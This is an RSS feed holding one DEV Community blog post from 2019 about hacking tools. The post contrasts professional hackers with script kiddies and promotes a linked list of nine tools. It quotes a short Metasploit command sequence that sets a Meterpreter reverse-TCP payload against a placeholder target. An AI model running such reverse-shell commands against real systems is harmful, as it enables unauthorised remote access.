<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: James</title>
    <description>The latest articles on DEV Community by James (@hackerforces).</description>
    <link>https://dev.to/hackerforces</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F295859%2Fea3b1941-8512-4fc6-8d38-9e48ce212e86.png</url>
      <title>DEV Community: James</title>
      <link>https://dev.to/hackerforces</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/hackerforces"/>
    <language>en</language>
    <item>
      <title>Professional Hacker's TOP 9 Hacking Tools</title>
      <dc:creator>James</dc:creator>
      <pubDate>Wed, 18 Dec 2019 19:14:52 +0000</pubDate>
      <link>https://dev.to/hackerforces/professional-hacker-s-top-9-hacking-software-26o9</link>
      <guid>https://dev.to/hackerforces/professional-hacker-s-top-9-hacking-software-26o9</guid>
      <description>&lt;p&gt;Every hacker has to use some hacking tools at some point. The hacker can be a professional white-hat hacker, black hat or gray hat hacker. Some people may say that a real hacker does not use any Hacking tools, who use the tools coded by others is a script kiddie. I will say this is their misconception. An operating system is also a software or tool for a hacker. If the hacker does not have a target software, then he has nothing to hack. &lt;/p&gt;

&lt;p&gt;The bad idea is Without understanding what the tool is doing for him, or he can't do anything without a supper automated hacking software. This is not done by a professional hacker.&lt;/p&gt;

&lt;p&gt;A hacker does not need to create a new Nmap to prove him as a real hacker. Because there is another Nmap already exist and ready to use. &lt;/p&gt;

&lt;p&gt;Metasploit is widely used by &lt;a href="https://hackerforces.com"&gt;professional hackers&lt;/a&gt;. Newbie hackers also install and try to use Metasploit-framework. &lt;/p&gt;

&lt;p&gt;Professional one knows Metasploit is a bundle of Ruby scripts. If for any reason any script not able to exploit an overflow vulnerability as expected, then he is able to test it locally to find out where is the problem and rewrite the script if required. &lt;/p&gt;

&lt;p&gt;Another person who does not have enough hacking skills, starting hacking using hacking tools for a short time, only will use a few commands such as:&lt;/p&gt;

&lt;p&gt;USE random/windows/exploit&lt;br&gt;
SET PAYLOAD windows/meterpreter/reverse_tcp&lt;br&gt;
SET LHOST 192.168.1.10&lt;br&gt;
SET LPORT port_number_without_forwarding&lt;br&gt;
SET RHOST target_address.com&lt;br&gt;
exploit&lt;/p&gt;

&lt;p&gt;When exploitation will be failed, he'll say Metasploit doesn't work. This is the difference between professional and script kiddies. &lt;/p&gt;

&lt;p&gt;Here is the list of TOP 9 hacking tools used by professional hackers: &lt;a href="https://hackerforces.com/9-hacking-tools-for-professional-hackers/"&gt;https://hackerforces.com/9-hacking-tools-for-professional-hackers/&lt;/a&gt;&lt;/p&gt;

</description>
      <category>hacking</category>
      <category>hacker</category>
    </item>
  </channel>
</rss>
